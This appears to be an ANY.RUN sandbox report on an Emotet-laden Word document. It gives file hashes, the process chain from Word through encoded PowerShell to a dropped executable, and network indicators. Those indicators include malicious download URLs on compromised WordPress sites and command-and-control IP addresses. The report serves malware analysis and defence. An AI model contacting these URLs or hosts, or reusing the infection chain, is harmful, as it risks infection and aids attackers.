| Field | Value |
|---|---|
| File name | DOC_with_EMOTET-fc56bd56.doc--385179250.zip |
| Full analysis | https://app.any.run/tasks/3b0c7a35-ffef-454f-be06-663f45cf5df5 |
| Verdict | Malicious activity |
| Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it was upgraded into very destructive malware. It targets mostly corporate victims, but even private users get infected in mass spam email campaigns. |
| Analysis date | June 12, 2019, 09:30:49 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | — |
| Indicators | — |
| MIME | application/zip |
| File info | Zip archive data, at least v2.0 to extract |
| MD5 | 52022BA0F1CADDB16AA0D7AEBAA0A700 |
| SHA1 | 3AE869467BB28FB1222CC63B32A757370FC41102 |
| SHA256 | 7AEB4B650FAC4A503099F32B54150DCA23640C2C0F3839EBF6D73CA271FB9250 |
| SSDEEP | 1536:SfVMmRB0JhxCbcVzVMjgP3c9IpP114+Q7WeZpE1BhCdj52z:St6JhGcZQgPhpPsL7bZgz |

| Property | Value |
|---|---|
| .zip | ZIP compressed archive (100) |
| ZipFileName | fc56bd56.doc.METADATA |
| ZipUncompressedSize | 379 |
| ZipCompressedSize | 261 |
| ZipCRC | 0x876a1751 |
| ZipModifyDate | 2019:05:23 10:39:11 |
| ZipCompression | Deflated |
| ZipBitFlag | 0x0008 |
| ZipRequiredVersion | 20 |

| PID | CMD | Path | Indicators | Parent process | Details |
|---|---|---|---|---|---|
| 1892 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\DOC_with_EMOTET-fc56bd56.doc--385179250.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Version: 5.60.0 |
| 3364 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rar$DIb1892.36875\fc56bd56.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WinRAR.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
| 3512 | powershell -nop -e <encoded command removed> | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
| 1224 | "C:\Users\admin\965.exe" | C:\Users\admin\965.exe | — | powershell.exe | User: admin; Company: VMware, Inc.; Integrity Level: MEDIUM; Description: VMware Resolution Set; Exit code: 0; Version: 9.6.2.31837 |
| 2540 | --99474b6 | C:\Users\admin\965.exe | — | 965.exe | User: admin; Company: VMware, Inc.; Integrity Level: MEDIUM; Description: VMware Resolution Set; Exit code: 0; Version: 9.6.2.31837 |
| 2196 | "C:\Users\admin\AppData\Local\soundser\soundser.exe" | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | 965.exe | User: admin; Company: VMware, Inc.; Integrity Level: MEDIUM; Description: VMware Resolution Set; Exit code: 0; Version: 9.6.2.31837 |
| 1572 | --3ab57678 | C:\Users\admin\AppData\Local\soundser\soundser.exe | — | soundser.exe | User: admin; Company: VMware, Inc.; Integrity Level: MEDIUM; Description: VMware Resolution Set; Version: 9.6.2.31837 |

| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR7061.tmp.cvr | — | — | — |
| 3512 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8YJH42ZIN3JL2T02N3QM.temp | — | — | — |
| 3364 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 400EF6AEBBC3D9F9F3F3E6BB20974395 | 09779222D45527B132507AE7B9823F5D6EF8253F62C39DF77F0B47A230C68C72 |
| 3364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE0B3A02.wmf | wmf | 12E8D7AD5FCA488DC470583D6873B1F4 | 987B9C9BADEA588FAAF3E384EFC47D367F1F749EF428D9DDC01AA1A867FBE316 |
| 3364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BCB099E1.wmf | wmf | 8CBA6FA6AC9823B8FB885382023F87C9 | 717F590F4F341316683DD93020B3FDC73AA28061359FCBB5052A2E9909205216 |
| 3364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9E0BE1B.wmf | wmf | F737FC7D23C6C93D8DA85761646EAD96 | 26E744CB13DA5B47BA49ED533065EEE06E308BCE2B4A44B2C0BDDD6ACBA0B0DC |
| 3364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8973FAC5.wmf | wmf | DDB953DADCFB7CC092C08199E6239D1A | 6B1B9E47BEBA7D8D737A29A0209CC54837950AD4987F3A7CF765232419FE73A9 |
| 3364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | 188FB830E0B567B17B048C3276A421FD | 7431260F8E5214B8506DD10495E26A9C45470CDE16755CB01B18A89576A6F404 |
| 3364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87F358D4.wmf | wmf | 63D724E2487BA9CEF594CDDA96BA8268 | FA8775C5E8C82C194C39562C85EBF40DA7339311EFADF390248E48D6F5CBABE9 |
| 3364 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Rar$DIb1892.36875\~$56bd56.doc | pgc | 4A77A8853301A41BA99D6EEA674FE6A4 | 55D717FFAF19CB621D1703EF9CCA5031C75DAB6A1A9BCBBEDBA452CC802F3C7F |

| PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
| 1572 | soundser.exe | POST | — | 159.65.241.220:8080 | http://159.65.241.220:8080/arizona/window/ringin/merge/ | US | — | — | malicious |
| 3512 | powershell.exe | GET | 403 | 145.14.144.111:80 | http://thoatran.000webhostapp.com/wp-admin/7h2rnb354/ | US | html | 8.25 Kb | shared |
| 3512 | powershell.exe | GET | 200 | 103.20.190.48:80 | http://radarutama.com/wp-admin/qjrrc81/ | ID | executable | 106 Kb | suspicious |

| PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
| 3512 | powershell.exe | 103.20.190.48:80 | radarutama.com | ARDH GLOBAL INDONESIA, PT | ID | suspicious |
| 3512 | powershell.exe | 145.14.144.111:80 | thoatran.000webhostapp.com | Hostinger International Limited | US | shared |
| 1572 | soundser.exe | 159.65.241.220:8080 | — | — | US | malicious |
| 3512 | powershell.exe | 42.112.30.99:443 | trunganh369.com | The Corporation for Financing & Promoting Technology | VN | unknown |
| 1572 | soundser.exe | 80.86.92.114:7080 | — | Host Europe GmbH | DE | malicious |

| Domain | IP | Reputation |
|---|---|---|
| thoatran.000webhostapp.com | — | shared |
| trunganh369.com | — | unknown |
| radarutama.com | — | suspicious |

| PID | Process | Class | Message |
|---|---|---|---|
| — | — | Not Suspicious Traffic | ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup) |
| 3512 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
| 3512 | powershell.exe | A Network Trojan was detected | AV INFO Suspicious EXE download from WordPress folder |
| 3512 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
| 3512 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
| 1572 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 4 |
| 1572 | soundser.exe | A Network Trojan was detected | ET CNC Feodo Tracker Reported CnC Server group 22 |